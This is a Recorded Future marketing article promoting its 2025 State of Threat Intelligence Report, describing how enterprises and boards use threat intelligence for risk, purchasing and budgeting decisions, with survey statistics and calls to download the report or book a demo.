These changes constitute a true paradigm shift in today’s enterprise security operations. In relatively short order, threat intelligence has evolved from just another security tool to an essential source of information for business strategy. So, what fueled this change?

Threat intelligence was once the domain of analysts hunched over indicators and dashboards. But as cyber risk began shaping balance sheets and brand value, intelligence moved beyond the SOC. Today, it informs everything from vulnerability management and incident response to compliance, insurance, and executive protection. The same datasets that once helped detect intrusions now guide procurement choices, risk modeling, and crisis communication plans.

As a result, we are seeing threat intelligence used by more than just security teams. It is now being used by governance, risk & compliance (GRC) teams, fraud teams, physical security teams, marketing and communications teams, and perhaps most importantly, by executive leadership teams and board leadership.

In our 2025 State of Threat Intelligence Report, Recorded Future found that nearly three-quarters (73%) of surveyed security professionals report using threat intelligence, along with 48% of Incident response teams, 47% of risk management teams, and 46% vulnerability management teams.

This continued spread of threat intelligence across business functions signals a shift from threat intelligence as a tool for optimizing defensive posture to one for optimizing strategic integration and risk management.

The Board’s New Dashboard: Threat Intelligence as a Business Translator

As the board’s appetite for timely, relevant risk insight grows, threat intelligence provides a vital bridge between technical data and strategic clarity. Boards are increasingly demanding information and briefings that translate adversarial behavior into plain-language impacts, such as:

• Threat Intelligence-informed presentations shaping risk committee agendas
• Executive protection and brand monitoring as extensions of enterprise intelligence
• Threat Intelligence-driven prioritization of cybersecurity budgets and third-party vetting

We can see these new applications play out in routine, yet vital, processes across the modern enterprise. Consider the following two scenarios and how they illustrate the ways in which threat intelligence is being used to determine executive and board-level decision-making:

• High-risk, high-impact threats (like ransomware campaigns or geopolitical disruption) trigger strategic investment in contingency planning and data redundancy, and/or decisions around where to do business.
• Persistent but lower-impact risks may inform tolerance thresholds or shape insurance coverage decisions.

These examples demonstrate how intelligence enables boards to truly act on risk, not just acknowledge it. With these tools, organizations are now able to use threat intelligence to decide which businesses to work with, which technologies to bring on board, and whether or not the business can expand into new regions safely and effectively.

Intelligence as the Backbone of Enterprise Agility: How Threat Intelligence Keeps Orgs On Their Toes

Whereas in the past, an organization might use threat intelligence to inform their security posture, today, threat intelligence is being used in a much more holistic way, directly powering overall enterprise adaptability, resilience, and governance outcomes.

In today’s rapidly changing threat landscape—with the growth of advanced, AI-enabled threats, supply-chain attacks, and shifting global regulations—boards can no longer afford to rely on static risk models. And it is comprehensive, timely, and relevant threat intelligence that helps keep today’s models dynamic.

The majority of organizations today use threat intelligence to guide business decisions related to purchasing, risk assessment, and resource allocation. In our 2025 State of Threat Intelligence Report, Recorded Future found that:

• Nearly two-thirds (65%) of surveyed security professionals say threat intelligence directly supports security technology purchasing decisions
• 58% say it guides risk assessment for business initiatives
• 53% say it supports incident response resource allocation

With all of these figures representing year-over-year increases, it’s safe to say that the majority of organizations have already adopted this more holistic view of threat intelligence. And for those that haven’t, all signs seem to suggest that they soon will. At the very least, we can say that they certainly ought to.

Intelligence-Driven Governance Is Essential for Modern Risk Management

The widespread adoption of threat intelligence across operations (including board-level decision-making) marks a turning point in how organizations perceive risk and value intelligence. No longer confined to security operations, threat intelligence is now a cornerstone of enterprise governance—a means of continuously informing executive and board-level risk decisions with clarity and confidence.

In both its capabilities and its applications, threat intelligence has evolved dramatically over recent years, maturing from a reactive tool to a foundation for informed risk decisionmaking across the enterprise. From the SOC team, to the C-suite, and all the way to the board, threat intelligence is being used to inform a wide range of critical business decisions. With this larger shift in security from a reactive defense to a holistic, intelligence-driven strategy engine, enterprises are expanding their understanding and use of threat intelligence and seeing meaningful benefits as a result.

Want to learn more about the state of enterprise threat intelligence today? Download our 2025 State of Threat Intelligence Report here.

Interested in making modern threat intelligence a part of your board’s operations? Book a customized demo with Recorded Future today.

Key points

1. The third annual State of Threat Intelligence Report reveals that nearly half of security decision-makers use threat intelligence for strategic planning and investment, making it one of the most common use cases for enterprise organizations.
2. With data breaches growing, most enterprises allocate substantial cybersecurity budgets to threat intelligence—and they plan to increase their spending in 2026.
3. While threat intelligence maturity has improved year over year, more than half of respondents consider their organizations to be less than advanced—and almost half cite poor integration as a major challenge.
4. More than half of security professionals expect moderate to significant changes to their threat intelligence needs in the next 12 months, and 81% said they plan to consolidate threat intelligence vendors.

Discover enterprises’ threat intelligence use cases, challenges, and future plans

Threat intelligence is no longer a nice-to-have—it's mission-critical. With state-sponsored attacks, cybercrime, and AI-powered threats on the rise, organizations are doubling down on threat intelligence as their secret weapon for proactive defense.

The 2025 State of Threat Intelligence is Recorded Future’s third annual flagship research report designed to take the pulse of the cybersecurity industry. Incorporating data from 615 cybersecurity executives, managers, and practitioners, the report reveals enterprise organizations’ use cases, challenges, and future investment plans.

By sharing what we’ve learned, we hope to help organizations make smarter decisions about their investments, vendor choices, and program maturity. And, it helps keep us grounded in the real challenges our customers face every day.

Check out key themes and highlights, and then explore the report for full details.

Threat intelligence usage and adoption

The report reveals that, in 2025, enterprises increasingly trust and rely on threat intelligence to inform business-critical decisions. Not only do 43% use it to guide strategic investments and planning, but most also say it helps them make decisions related to purchasing, risk assessment, and resource allocation.

Compared to 2024, a larger percentage of organizations now have full-time threat intelligence teams, and 89% pay at least one threat intelligence vendor. Find out about their top use cases, how frequently they use it, and the variety of teams across their organizations that actively consume the intelligence.

Threat intelligence spending and success metrics

Data breaches involving a third party doubled from 2024 to 2025, so no surprise that our survey found that most enterprise organizations allocate substantial cybersecurity budgets to threat intelligence. Seventy-six percent invest $250k or more per year in external threat intelligence products (excluding services), and 14% spend more than $1 million per year.

When asked about how they measure the ROI of threat intelligence, most said their organizations focus on speed and efficiency gains. See how they rank success metrics, from improved threat detection and response times to reduction in the number of incidents to cost savings from prevented incidents.

Challenges with threat intelligence maturity

The survey found that threat intelligence maturity is improving year over year, with 49% of surveyed security professionals saying their maturity level is advanced. In other words, they have tools that combine outputs from multiple threat intelligence sources, a dedicated threat intelligence team, and automated workflows that integrate with most security activities including business risk assessment.

As their organizations increase investment to grow their maturity, survey respondents told us they’re also experiencing challenges related to threat intelligence vendors. Almost half are frustrated by poor integration with their existing security tools, but issues ranging from vendor credibility and cost effectiveness also come into play. Explore the challenges your peers are facing on the journey to threat intelligence maturity.

Future plans to strengthen threat intelligence

Finally, we asked respondents to tell us how they plan to improve their threat intelligence maturity and outcomes. Ninety-one percent said they plan to invest more in threat intelligence in 2026, and more than half expect moderate to significant changes to their threat intelligence needs in the next 12 months.

Given that 81% said they plan to consolidate threat intelligence vendors, they should prioritize vendors that support the most critical capabilities across a number of use cases. See the top five capabilities our respondents prioritize in their day-to-day work.

Find out where your organization stands in relation to your peers

The 2025 State of Threat Intelligence Report makes it clear: As threat intelligence delivers increasing strategic value, forward-thinking enterprises are boosting investment and evolving their use cases.

Download the report to discover ideas and information that can help your organization succeed on its own maturity journey.